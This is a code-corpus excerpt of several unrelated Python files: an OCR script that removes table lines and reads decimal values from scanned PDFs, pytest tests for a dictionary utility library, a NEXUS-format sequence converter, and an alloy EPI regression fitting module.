if lines is None: # no straight lines were detected\n        print('\\n[Line detection result]')\n        print('  No straight lines were detected.')\n    \n    else: # straight lines were detected\n        print('\\n[Line detection result]')\n        print('  Straight lines were detected. The detected lines will be removed.')\n        for line in lines:\n            x1, y1, x2, y2 = line[0]\n            # draw each detected line in red\n            red_lines_img = cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n        print('\\n[Visualization of the detected lines]')\n        print('  The red parts are the lines that could be detected.')\n        # plt.imshow(cv2.cvtColor(red_lines_img, cv2.COLOR_BGR2RGB))\n        # plt.show()\n\n        for line in lines:\n            x1, y1, x2, y2 = line[0]\n            # erase each detected line (draw it in white); it would show as black once binarized\n            no_lines_img = cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 1)\n        \n        print('\\n[Result of deleting the detected lines from the original image]')\n        print('  The white parts are where detected lines were erased (indistinguishable on a white background).')\n        # plt.imshow(cv2.cvtColor(no_lines_img, cv2.COLOR_BGR2RGB))\n        # plt.show()\n\n    # NOTE: if no lines were detected above, no_lines_img is undefined here (a latent bug kept from the original flow).\n    image2 = Image.fromarray(no_lines_img)\n\n    img = np.array(image2)\n    # plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n    # plt.show()\n\n    # convert to grayscale (pre-processing before binarization)\n    img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    # binarization: reduce to a simple black(0)/white(1) two-level image\n    retval, img_binary = cv2.threshold(img_gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n    # plt.imshow(img_binary)\n    print('[Detecting straight lines...] binarized image - Binarization')\n    # plt.imshow(cv2.cvtColor(img_binary, cv2.COLOR_BGR2RGB))\n    # plt.show()\n\n    lines = cv2.HoughLinesP(img_binary, rho=1, theta=np.pi/360, threshold=15, minLineLength=60, maxLineGap=5.4)\n\n    if lines is None: # no straight lines were detected\n        print('\\n[Line detection result]')\n        print('  No straight lines were detected.')\n    \n    else: # straight lines were detected\n        print('\\n[Line detection result]')\n        print('  Straight lines were detected. The detected lines will be removed.')\n        for line in lines:\n            x1, y1, x2, y2 = line[0]\n            # draw each detected line in red\n            red_lines_img = cv2.line(img, (x1, y1), (x2, y2), (0, 0, 255), 1)\n        print('\\n[Visualization of the detected lines]')\n        print('  The red parts are the lines that could be detected.')\n        # plt.imshow(cv2.cvtColor(red_lines_img, cv2.COLOR_BGR2RGB))\n        # plt.show()\n\n        for line in lines:\n            x1, y1, x2, y2 = line[0]\n            # erase each detected line (draw it in white); it would show as black once binarized\n            no_lines_img = cv2.line(img, (x1, y1), (x2, y2), (255, 255, 255), 1)\n\n        print('\\n[Result of deleting the detected lines from the original image]')\n        print('  The white parts are where detected lines were erased (indistinguishable on a white background).')\n        # plt.imshow(cv2.cvtColor(no_lines_img, cv2.COLOR_BGR2RGB))\n        # plt.show()\n\n\n    image2 = Image.fromarray(no_lines_img)\n\n\n    # extract the text of the loaded page\n    # print(extract_text(page))\n    # read characters together with their coordinates\n\n    # tesseract_layout=No\n    # meaning of No:\n    # 0  orientation and script detection (OSD) only.\n    # 1  automatic page segmentation with OSD.\n    # 2  automatic page segmentation, but no OSD, or OCR. (not implemented)\n    # 3  fully automatic page segmentation, but no OSD. (default)\n    # 4  assume a single column of text of variable sizes.\n    # 5  assume a single uniform block of vertically aligned text.\n    # 6  assume a single uniform block of text.\n    # 7  treat the image as a single text line.\n    # 8  treat the image as a single word.\n    # 9  treat the image as a single word in a circle.\n    # 10 treat the image as a single character.\n    # 11 sparse text. Find as much text as possible in no particular order.\n    # 12 sparse text with OSD.\n    # 13 raw line. Treat the image as a single text line.\n\n    # box_builder = pyocr.builders.WordBoxBuilder(tesseract_layout=11)\n    box_builder = pyocr.builders.WordBoxBuilder()\n    text_position = tool.image_to_string(image2,lang=\"eng\",builder=box_builder)\n\n    # print the extracted words with their coordinates, and draw boxes onto the image\n    img2 = np.array(image)\n    t0 = \"\"\n    p0 = [0,0]\n    p1 = [0,0]\n    flag = False\n    limit = 0.95\n    box_builder2 = pyocr.builders.WordBoxBuilder(tesseract_layout=7)\n    \n    Contents = []\n    Positions = []\n    PointN = 0\n    for res in text_position:\n        m = res.content\n        x = res.position\n        print(m)\n\n        # normalize frequent OCR confusions before trying to parse a number\n        m = m.replace(\",\",\".\").replace(\"@\",\"0.\").replace(\"/\",\"\").replace(\"\\\\\",\"\").replace(\"©\",\"0.\").replace(\"Q\",\"0\")\n        m = m.replace(\"Q\",\"0\").replace(\"U\",\"0\").replace(\"P\",\"0\").replace(' ', '').replace('ha', '42').replace('eo', '70').replace('oe', '0.')\n        m = m.replace(\"o\",\"\").replace(\"-\",\"\").replace(\"«\",\"\")\n        if m == \"(0\" or m == \"0\":\n            m = m + \".\"\n        if m == \"(0.\" or m == \"0.\":\n            t0 = m\n            p0 = res.position[0]\n            flag = True\n        else:\n            t = t0 + m\n            t0 = \"\"\n\n            if flag == False:\n                p0 = res.position[0]\n            p1 = res.position[1]\n            flag = False\n\n            if re.search(r'\\d', t):\n                # print(m)\n                # print(res.position)\n                if isfloat(t.replace(\"(\",\"\").replace(\")\",\"\")):\n                    a = float(t.replace(\"(\",\"\").replace(\")\",\"\"))\n                    print(a)\n                    if a >= limit and a < 1.0 :\n                        PointN += 1\n                        Contents.append(a)\n                        Positions.append([list(p0),list(p1)])\n                    \n                    elif a >= 1 and a <= 99:\n                        b = a / 100.0\n                        if b >= limit and b < 1.0 :\n                            p02 = list(p0)\n                            p12 = list(p1)\n                            p02[0] = p02[0]- int((p12[0]-p02[0])*1.4)\n                            p0 = tuple(p02)\n                            PointN += 1\n                            Contents.append(a)\n                            Positions.append([list(p0),list(p1)])\n    \n    # plt.imshow(cv2.cvtColor(img2, cv2.COLOR_BGR2RGB))\n    # plt.show()\n\n    box_builder2 = pyocr.builders.TextBuilder(tesseract_layout=7)\n    Positions2 = []\n    PointN2 = 0\n    Contents2 = []\n    for P in Positions:\n\n        img3 = img2[P[0][1]-5:P[1][1]+5,P[0][0]-5:P[1][0]+5]\n        \n        # plt.imshow(cv2.cvtColor(img3, cv2.COLOR_BGR2RGB))\n        # plt.show()\n        image3 = Image.fromarray(img3)\n        \n        t = tool.image_to_string(image3,lang=\"eng\",builder=box_builder2)\n        print(\"?:\" + t)\n        t = t.replace(\",\",\".\").replace(\"@\",\"0.\").replace(\"/\",\"\").replace(\"\\\\\",\"\").replace(\"©\",\"0.\").replace(\"Q\",\"0\")\n        
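# second cleanup pass over the re-OCR'd crop, mirroring the substitutions used above\n        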
t = t.replace(\"Q\",\"0\").replace(\"U\",\"0\").replace(\"P\",\"0\").replace(' ', '').replace('ha', '42').replace('eo', '70').replace('oe', '0.')\n t = t.replace(\"o\",\"\").replace(\"-\",\"\").replace(\"«\",\"\")\n \n if re.search(r'\\d', t):\n # print(m)\n # print(res.position)\n if isfloat(t.replace(\"(\",\"\").replace(\")\",\"\")):\n a = float(t.replace(\"(\",\"\").replace(\")\",\"\"))\n print(a)\n if a >= limit and a < 1.0 :\n PointN2 += 1\n Contents2.append(a)\n Positions2.append(P)\n \n elif a >= 1 and a <= 99:\n b = a / 100.0\n if b >= limit and b < 1.0 :\n PointN2 += 1\n Contents2.append(a)\n Positions2.append(P)\n \n print(Contents2)\n Total_Contents.append(Contents2)\n Total_Positions.append(Positions2)\n Total_PointN.append(PointN2)\n\ni = 0\nfor image in Out_image2:\n if Total_PointN[i] > 0:\n img2 = np.array(image)\n t1 = \"[ N = \" + str(Total_PointN[i]) + \" ]\"\n cv2.putText(img2, t1, (Tx, Ty), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 2, cv2.LINE_AA)\n Position = Total_Positions[i]\n for P in Position:\n P0 = [int(P[0][0]/Cdpi) - LineW*2,int(P[0][1]/Cdpi) - LineW*2]\n P1 = [int(P[1][0]/Cdpi) + LineW,int(P[1][1]/Cdpi) + LineW]\n cv2.rectangle(img2,tuple(P0),tuple(P1),(255,0,0),LineW)\n\n pil_image = Image.fromarray(img2)\n im_pdf = pil_image.convert(\"RGB\")\n fname = \"P\"+str(no)+ \".pdf\"\n # im_pdf.save(r\"test.pdf\")\n im_pdf.save(fname)\n pdf_file_merger.append(fname)\n os.remove(fname)\n\n i += 1\n\n\n\npdf_file_merger.write('test2.pdf')\npdf_file_merger.close()\n\n","repo_name":"tkanyama/PdfAutoOCR","sub_path":"PdfAutoOCR2.py","file_name":"PdfAutoOCR2.py","file_ext":"py","file_size_in_byte":13744,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35855280115","text":"# -*- coding: utf-8 -*-\n\nimport tempfile\nfrom contextlib import ExitStack\n\nimport pytest\nimport yaml\n\nfrom ktz.collections import (Incrementer, buckets, dconv, dflat, dmerge, drslv,\n lflat, ryaml, unbucket)\n\n\nclass TestBuckets:\n\n #\n # without key and without mapper\n #\n def test_buckets_simple(self):\n ref = {1: [2], 3: [4]}\n ret = buckets(((1, 2), (3, 4)))\n assert ret == ref\n\n def test_buckets_multiple(self):\n ref = {1: [2, 3, 4], 5: [6, 7]}\n ret = buckets(((1, 2), (1, 3), (1, 4), (5, 6), (5, 7)))\n assert ret == ref\n\n #\n # with key and without mapper\n #\n def test_buckets_key(self):\n ref = {0: [0, 2, 4], 1: [1, 3, 5]}\n ret = buckets(range(6), key=lambda _, x: (x % 2, x))\n assert ret == ref\n\n def test_buckets_index(self):\n ref = {1: [0], 2: [1], 3: [2]}\n ret = buckets(range(3), key=lambda i, x: (i + 1, x))\n assert ret == ref\n\n #\n # without key and with mapper\n #\n def test_buckets_mapper(self):\n ref = {1: 9, 5: 13}\n ret = buckets(\n ((1, 2), (1, 3), (1, 4), (5, 6), (5, 7)),\n mapper=sum,\n )\n assert ref == ret\n\n #\n # with key and with mapper\n #\n def test_buckets_key_mapper(self):\n ref = {0: 6, 1: 9}\n ret = buckets(\n range(6),\n key=lambda _, x: (x % 2, x),\n mapper=sum,\n )\n\n assert ret == ref\n\n\nclass TestUnbucket:\n def test_unbucket(self):\n ref = [(1, 2), (5, 6), (5, 7)]\n ret = unbucket({1: [2], 5: [6, 7]})\n assert ret == ref\n\n\nclass TestLFlat:\n def test_lflat(self):\n ref = 1, 2\n ret = lflat([[[1]], [2]])\n assert tuple(ret) == ref\n\n def test_lflat_depth_1(self):\n ref = [1], 2\n ret = lflat([[1], 2], depth=1)\n assert tuple(ret) == ref\n\n def test_lflat_depth_2(self):\n ref = 1, [2]\n ret = lflat([[1], [[2]]], depth=2)\n assert tuple(ret) == ref\n\n def test_lflat_str(self):\n 
ref = \"foo\", \"bar\"\n ret = lflat([[[\"foo\"]], [\"bar\"]])\n assert tuple(ret) == ref\n\n def test_lflat_tuple(self):\n ref = \"foo\", \"bar\"\n ret = lflat((((\"foo\")), (\"bar\")))\n assert tuple(ret) == ref\n\n\nclass TestIncrementer:\n def test_increment_default(self):\n incr = Incrementer()\n assert incr[\"a\"] == 0\n assert incr[\"b\"] == 1\n assert incr[\"a\"] == 0\n assert incr[\"c\"] == 2\n\n def test_increment_fn_iterable(self):\n incr = Incrementer(fn=range(10, 100))\n\n assert incr[\"a\"] == 10\n assert incr[\"b\"] == 11\n assert incr[\"a\"] == 10\n assert incr[\"c\"] == 12\n\n def test_increment_fn_iterator(self):\n incr = Incrementer(fn=iter(range(10, 100)))\n\n assert incr[\"a\"] == 10\n assert incr[\"b\"] == 11\n assert incr[\"a\"] == 10\n assert incr[\"c\"] == 12\n\n def test_increment_setitem(self):\n incr = Incrementer()\n with pytest.raises(KeyError):\n incr[\"foo\"] = 3\n\n def test_increment_freeze_unfreeze(self):\n incr = Incrementer()\n assert incr[\"a\"] == 0\n\n incr.freeze()\n with pytest.raises(NameError):\n incr[\"b\"]\n\n incr.unfreeze()\n assert incr[\"b\"] == 1\n\n\nclass TestDMerge:\n def test_flat(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=3, bar=2, xyz=4)\n\n def test_none(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=None, xyz=4)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=1, bar=2, xyz=4)\n\n def test_empty(self):\n res = dmerge()\n assert res == {}\n\n def test_deep(self):\n d1 = dict(foo=dict(a=1, b=2), bar=3)\n d2 = dict(foo=dict(a=3, c=4), xyz=5)\n\n res = dmerge(d1, d2)\n assert res == dict(foo=dict(a=3, b=2, c=4), bar=3, xyz=5)\n\n def test_multiple(self):\n d1 = dict(foo=1, d1=1)\n d2 = dict(foo=3, xyz=4, d2=2)\n d3 = dict(foo=5, xyz=6, d3=3)\n\n res = dmerge(d1, d2, d3)\n assert res == dict(foo=5, xyz=6, d1=1, d2=2, d3=3)\n\n\nclass TestDFlat:\n def test_empty(self):\n res = dflat({})\n assert res == {}\n\n def test_simple(self):\n res = dflat(dict(foo=1, bar=2))\n assert res == dict(foo=1, bar=2)\n\n def test_deep(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n \"2\": {\n \"1\": \"2.1\",\n },\n }\n\n res = dflat(d)\n assert res == {\n \"1.1.1\": \"1.1.1\",\n \"1.1.2\": \"1.1.2\",\n \"1.2.1\": \"1.2.1\",\n \"2.1\": \"2.1\",\n }\n\n def test_only(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n \"2\": {\n \"1\": \"2.1\",\n },\n }\n\n res = dflat(d, only=2)\n assert res == {\n \"1.1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"},\n \"1.2\": {\"1\": \"1.2.1\"},\n \"2.1\": \"2.1\",\n }\n\n def test_sep(self):\n d = {\"1\": {\"1\": \"1.1\"}}\n res = dflat(d, sep=\" \")\n assert res == {\"1 1\": \"1.1\"}\n\n def test_dict_leaves(self):\n d = {\"1\": {}, \"2\": {\"1\": {}, \"2\": {}}}\n res = dflat(d)\n assert res == {\"1\": {}, \"2.1\": {}, \"2.2\": {}}\n\n # TODO release 0.3\n # def test_skiplast(self):\n # d = {\n # \"1\": {\n # \"1\": {\n # \"1\": \"1.1.1\",\n # \"2\": \"1.1.2\",\n # },\n # \"2\": {\n # \"1\": \"1.2.1\",\n # },\n # },\n # \"2\": {\n # \"1\": \"2.1\",\n # },\n # }\n\n # res = dflat(d, skiplast=0)\n # assert res == dflat(d)\n\n # res = dflat(d, skiplast=1)\n # assert res == {\n # \"1.1\": {\n # \"1\": \"1.1.1\",\n # \"2\": \"1.1.2\",\n # },\n # \"1.2\": {\n # \"1\": \"1.2.1\",\n # },\n # \"2.1\": \"2.1\",\n # }\n\n # res = dflat(d, skiplast=2)\n # assert res == d\n\n\nclass TestDrslv:\n def 
test_empty_dic(self):\n d = {}\n\n # defaults to a key error\n with pytest.raises(KeyError):\n drslv(d, \"foo\")\n\n res = drslv(d, \"foo\", default=None)\n assert res is None\n\n def test_small(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n res = drslv(d, \"flat\")\n assert res == \"flat\"\n\n res = drslv(d, \"foo.bar\")\n assert res == \"deep\"\n\n def test_too_deep(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n with pytest.raises(KeyError):\n drslv(d, \"foo.bar.baz\")\n\n def test_sep(self):\n d = dict(foo=dict(bar=\"deep\"), flat=\"flat\")\n\n res = drslv(d, \"foo bar\", sep=\" \")\n assert res == \"deep\"\n\n def test_collapse(self):\n d = {\n \"1\": {\n \"1\": {\n \"1\": \"1.1.1\",\n \"2\": \"1.1.2\",\n },\n \"2\": {\n \"1\": \"1.2.1\",\n },\n },\n }\n\n res = drslv(d, \"1.1.1\")\n assert res == \"1.1.1\"\n\n res = drslv(d, \"1.1.1\", collapse=1)\n assert res == {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}\n\n res = drslv(d, \"1.1.1\", collapse=2)\n assert res == {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}, \"2\": {\"1\": \"1.2.1\"}}\n\n res = drslv(d, \"1.1\", collapse=1)\n assert res == {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}, \"2\": {\"1\": \"1.2.1\"}}\n\n with pytest.raises(KeyError):\n drslv(d, \"1.1.3\", collapse=2)\n\n def test_deprecated_skiplast(self):\n d = {\"1\": {\"1\": {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}}}\n\n # skiplast\n with pytest.deprecated_call():\n res = drslv(d, \"1.1.1\", skiplast=1)\n assert res == {\"1\": \"1.1.1\", \"2\": \"1.1.2\"}\n\n def test_wildcard(self):\n d = dict(a=dict(foo=dict(b=3)))\n assert drslv(d, \"a.*.b\") == 3\n\n def test_wildcard_error(self):\n d = dict(a=dict(x=1), b=dict(y=1))\n with pytest.raises(KeyError):\n drslv(d, \"*.x\")\n\n\nclass TestDConv:\n def test_empty_dic(self):\n d1 = {}\n d2 = dconv(d1)\n\n assert d1 == d2\n assert d1 is not d2\n\n def test_single_fn(self):\n d1 = dict(a=2)\n d2 = dconv(d1, lambda t: str(t))\n assert d2 == dict(a=\"2\")\n\n def test_multiple_fn(self):\n def stoi(v):\n if isinstance(v, str):\n return int(v)\n return v\n\n def plus1(v):\n if isinstance(v, int):\n return v + 1\n return v\n\n d1 = dict(a=1, b=\"2\", c=[])\n d2 = dconv(d1, stoi, plus1)\n\n assert d2 == dict(a=2, b=3, c=[])\n\n def test_key(self):\n def fn(v, k):\n if k == \"foo\":\n return True\n return False\n\n d1 = dict(foo=1, bar=2)\n d2 = dconv(d1, fn)\n\n assert d2 == dict(foo=True, bar=False)\n\n def test_deep(self):\n d1 = dict(foo=1, bar=dict(a=2, b=3))\n d2 = dconv(d1, lambda v: v + 2)\n assert d2 == dict(foo=3, bar=dict(a=4, b=5))\n\n\nclass TestRyaml:\n def test_noargs(self):\n ret = ryaml()\n assert ret == {}\n\n def test_only_overwrites(self):\n ret = ryaml(foo=1)\n assert ret == dict(foo=1)\n\n def test_single(self):\n d1 = dict(foo=1, bar=2)\n\n with tempfile.NamedTemporaryFile(mode=\"w\") as fd:\n yaml.dump(d1, fd)\n ret = ryaml(fd.name)\n\n assert ret == d1\n\n def test_multi(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name)\n\n assert ret == dict(foo=3, bar=2, xyz=4)\n\n def test_multi_deep(self):\n d1 = dict(foo=dict(a=1, b=2), bar=2)\n d2 = dict(foo=dict(a=3, c=4), xyz=5)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n 
yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name)\n\n assert ret == dict(foo=dict(a=3, b=2, c=4), bar=2, xyz=5)\n\n def test_overwrites(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=4)\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name, xyz=5)\n\n assert ret == dict(foo=3, bar=2, xyz=5)\n\n def test_overwrites_deep(self):\n d1 = dict(foo=1, bar=2)\n d2 = dict(foo=3, xyz=dict(a=1, b=2))\n\n with ExitStack() as stack:\n fd1 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n fd2 = stack.enter_context(tempfile.NamedTemporaryFile(mode=\"w\"))\n\n yaml.dump(d1, fd1)\n yaml.dump(d2, fd2)\n\n ret = ryaml(fd1.name, fd2.name, xyz=dict(a=3, c=3))\n\n assert ret == dict(foo=3, bar=2, xyz=dict(a=3, b=2, c=3))\n","repo_name":"kantholtz/ktz","sub_path":"ktz/tests/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":11831,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"4846593038","text":"\nclass nexus_converter:\n\n def __init__(self,file,fast, out, concat):\n self.file = file\n self.input = fast\n self.output = out\n self.taxa = 0\n self.lenght = 0\n self.sequence = {}\n self.concat = concat\n self.b_taxa = \"\"\n self.nexus_rearrange()\n if self.output == 'fasta':\n self.nexus_to_fasta()\n elif self.output == 'phylip':\n self.nexus_to_phylip()\n elif self.output == 'aln' or self.output == 'clustal':\n self.nexus_to_aln_clustal()\n\n def nexus_rearrange(self):\n line = \"\"\n with open(self.file, \"r\") as nexus_file:\n while 'MATRIX' not in line:\n line = nexus_file.readline()\n line = nexus_file.readline()\n while ';' not in line:\n self.taxa +=1\n self.sequence[line.strip().split(' ')[0]] = line.strip().split(' ')[1]\n line = nexus_file.readline()\n self.lenght = len(sorted(self.sequence.values(), key=len)[-1])\n self.b_taxa = sorted(self.sequence.keys(), key=len)[-1]\n\n def nexus_to_fasta(self):\n if self.concat == 'yes':\n return self.sequence\n\n fasta = ''\n for k,v in self.sequence.items():\n fasta += \">{}\\n\".format(k)\n for start in range(0,self.lenght,60):\n fasta += \"{}\\n\".format(v[start:start+60])\n with open(self.file.replace('.nex','.fasta'), 'w+') as writ:\n writ.write(fasta)\n\n def nexus_to_phylip(self):\n if self.concat == 'yes':\n return self.sequence\n\n seq ='{} {} s\\n\\n'.format(self.taxa, self.lenght)\n for k,v in self.sequence.items():\n seq+=\"{}{} {}\\n\".format(\" \"*(len(self.b_taxa)-len(k)),k,v)\n\n with open(self.file.replace('.nex','.phy'), 'w+') as writ:\n writ.write(seq)\n\n def nexus_to_aln_clustal(self):\n if self.concat == 'yes':\n return self.sequence\n\n seq = 'CLUSTAL W:\\n\\n'\n for start in range(0,self.lenght,60):\n for k,v in self.sequence.items():\n seq += \"{}{} {}\\n\".format(\" \"*(len(self.b_taxa)-len(k)),k,v[start:start+60])\n seq+='\\n'\n\n with open(self.file.replace('.nex','.aln'),'w+') as writ:\n writ.write(seq)\n\n\n\n","repo_name":"Bioinformatics-side-projects/concatenator2","sub_path":"nexus_to_/class_nexus.py","file_name":"class_nexus.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"8895992614","text":"\n\nimport numpy as np \nimport os \n\nimport matplotlib\nmatplotlib.use('Agg')\nimport 
matplotlib.pyplot as plt\n\nfrom myvasp import vasp_func as vf \n\nfrom myvasp import vasp_epi_res \n\n\n\n\n\n\n\n\n# EPI fitting, which follows E = X @ beta \nclass class_epi_fit:\n def __init__(self, lpairs, E):\n vf.confirm_0( len(lpairs.leta) - len(E), str1='wrong len(leta_res) ' )\n self.lpairs = lpairs\n self.E = E\n\n\n\n\n #-----------------------------\n \n def routine_1(self, sd, tt=0.8, dmax=5, islip='fcc_partial', dmax_max=11, fname_suffix=''):\n ntrain = np.around( len(self.lpairs.leta) * tt )\n print('ntrain:', ntrain) \n\n epi_res1 = self.calc_epi(dmax=dmax, ntrain=ntrain) \n epi_res1.save_epi_res(fname_suffix=fname_suffix) \n epi_res1.write_epi_res(fname_suffix=fname_suffix) \n\n print('==> scan ntrain')\n self.calc_epi(dmax=dmax, ntrain=ntrain, scan_ntrain=True, fname_suffix=fname_suffix) \n fname1 = 'lepi_res_ntrain_%s.pkl' %(fname_suffix)\n self.calc_sdUss_tilde(filename=fname1, islip = islip) \n self.plot_lepi_res_ntrain(filename=fname1) \n if fname_suffix == 'slip':\n self.plot_lepi_res_ntrain_2(filename=fname1, sd=sd) \n\n print('==> scan dmax')\n dmax_max = np.min([ self.lpairs.shellmax, dmax_max ])\n self.scan_dmax(dmax_range=np.arange(2, dmax_max), ntrain=ntrain, fname_suffix=fname_suffix) \n fname2 = 'lepi_res_dmax_%s.pkl' %(fname_suffix)\n self.calc_sdUss_tilde(filename=fname2, islip = islip) \n self.plot_lepi_res_dmax(filename=fname2) \n\n\n\n\n #=============================\n\n def calc_epi(self, dmax, ntrain, scan_ntrain=False, fname_suffix=''): \n X = self.lpairs.get_X(dmax) \n E = self.E.copy() \n\n if scan_ntrain == False:\n ntrain_range = np.array([ntrain]) \n else:\n temp = ( (self.lpairs.nelem+1) * self.lpairs.nelem -2) /2 * dmax \n ntrain_min = int( np.ceil( (temp+2)/10 )*10 )\n ntrain_range = np.arange(ntrain_min, ntrain+1) \n\n lepi_res = [] \n for i in ntrain_range:\n X_train, X_test = vf.split_train_test(X, i) \n E_train, E_test = vf.split_train_test(E, i) \n\n lstsq_res = np.linalg.lstsq(X_train, E_train, rcond=None) \n beta = lstsq_res[0] \n E_p = X @ beta # EPI predicted energy \n\n epi_res1 = vasp_epi_res.class_epi_res( self.lpairs.nelem, self.lpairs.r_shell, dmax, i, lstsq_res, X, E, E_p)\n lepi_res.append( epi_res1 )\n \n if scan_ntrain == False:\n return lepi_res[0]\n else:\n if fname_suffix != '':\n filename = 'lepi_res_ntrain_%s.pkl' %(fname_suffix) \n else:\n filename = 'lepi_res_ntrain.pkl' \n vf.my_save_pkl(lepi_res, filename)\n\n\n\n\n #=============================\n\n def scan_dmax(self, dmax_range, ntrain, fname_suffix=''):\n lepi_res = [] \n for dmax in dmax_range:\n epi_res1 = self.calc_epi(dmax, ntrain) \n lepi_res.append( epi_res1 )\n\n if fname_suffix != '':\n filename = 'lepi_res_dmax_%s.pkl' %(fname_suffix) \n else:\n filename = 'lepi_res_dmax.pkl' \n vf.my_save_pkl(lepi_res, filename)\n\n\n\n\n def calc_sdUss_tilde(self, filename, cn=np.array([1, 1]), islip='fcc_partial' ):\n from myalloy import main as myalloy_main\n a1 = myalloy_main.alloy_class(name='fcc_alloy', cn=cn, brav_latt='fcc')\n print('islip:', islip)\n\n lepi_res = vf.my_read_pkl(filename) \n sigma_dUss_tilde = np.array([]) \n\n for i in np.arange( len(lepi_res) ):\n a1.set_EPI( lepi_res[i].epi )\n temp = a1.calc_sigma_dUss_tilde(t = islip) \n sigma_dUss_tilde = np.append( sigma_dUss_tilde, temp ) \n\n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n np.savetxt(filename2, sigma_dUss_tilde)\n\n\n\n\n #============================================\n # plot lepi_res - ntrain \n #============================================\n\n def plot_lepi_res_ntrain_2(self, 
filename, sd): \n lepi_res = vf.my_read_pkl(filename) \n \n Ntot = np.prod(sd)*6\n Ntot_m = Ntot / (sd[0] * sd[1])\n Ntot_s = Ntot / np.sqrt(sd[0]*2 * sd[1])\n \n dmax = np.array([])\n ntrain = np.array([])\n\n mE_train = np.array([])\n sE_train = np.array([])\n\n mE_p_train = np.array([])\n sE_p_train = np.array([])\n\n Vnm = np.zeros(lepi_res[0].dmax) # a specific pair nm \n\n for i in np.arange( len(lepi_res) ):\n dmax = np.append( dmax, lepi_res[i].dmax ) \n ntrain = np.append( ntrain, lepi_res[i].ntrain ) \n\n mE_train = np.append( mE_train, lepi_res[i].E_train.mean() ) \n sE_train = np.append( sE_train, lepi_res[i].E_train.std() ) \n\n mE_p_train = np.append( mE_p_train, lepi_res[i].E_p_train.mean() ) \n sE_p_train = np.append( sE_p_train, lepi_res[i].E_p_train.std() )\n \n Vnm = np.vstack([Vnm, lepi_res[i].epi[:,0,1]])\n Vnm=np.delete(Vnm, 0, 0) \n\n\n ax1 = create_ax1() \n fig_xlim = [0, ntrain[-1]]\n\n for j in np.arange(Vnm.shape[1]):\n str1 = '$d_{%d}$' %(j+1)\n ax1[0].plot( ntrain, Vnm[:,j], '-', label=str1 )\n ax1[0].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n ax1[1].plot( ntrain, mE_train *Ntot_m, '-', color='k', label='from atomistically computed energies ')\n ax1[1].plot( ntrain, mE_p_train *Ntot_m, '-', color='C3', label='from EPI-predicted energies')\n # ax1[1].plot( fig_xlim, [0, 0], '--', color='gray' ) \n\n\n ax1[2].plot( ntrain, sE_train *Ntot_s, '-', color='k', label='from atomistically computed energies ')\n ax1[2].plot( ntrain, sE_p_train *Ntot_s, '-', color='C3', label='from EPI-predicted energies')\n\n filename2 = '%s.sdUss_tilde.txt' %(filename[0:-4])\n if os.path.exists(filename2) :\n sigma_dUss_tilde = np.loadtxt(filename2) \n ax1[2].plot( ntrain, sigma_dUss_tilde, '-', color='C2', label='analytical $\\\\widetilde{\\\\sigma}_{\\\\Delta U_{s-s}}$')\n\n \n ax1[0].legend( fontsize=6, loc='lower left', ncol=2) \n ax1[1].legend( fontsize=6, loc='lower left' ) \n ax1[2].legend( fontsize=6, loc='lower left' ) \n\n ax1[2].set_xlim( fig_xlim )\n ax1[2].set_xlabel('$N_\\\\mathrm{train}$')\n\n ax1[0].set_ylim([-0.06, 0.04]) \n # ax1[1].set_ylim([-0.02, 0.02]) \n # ax1[2].set_ylim([0, 0.06]) \n\n ax1[0].set_ylabel('EPI $V_{\\\\mathrm{AuNi}, d}$ (eV)')\n ax1[1].set_ylabel('mean of $ E_\\\\mathrm{tot} /(N_1 N_2) $ (eV)')\n ax1[2].set_ylabel( 'std of $ E_\\\\mathrm{tot} /\\\\sqrt{2 N_1 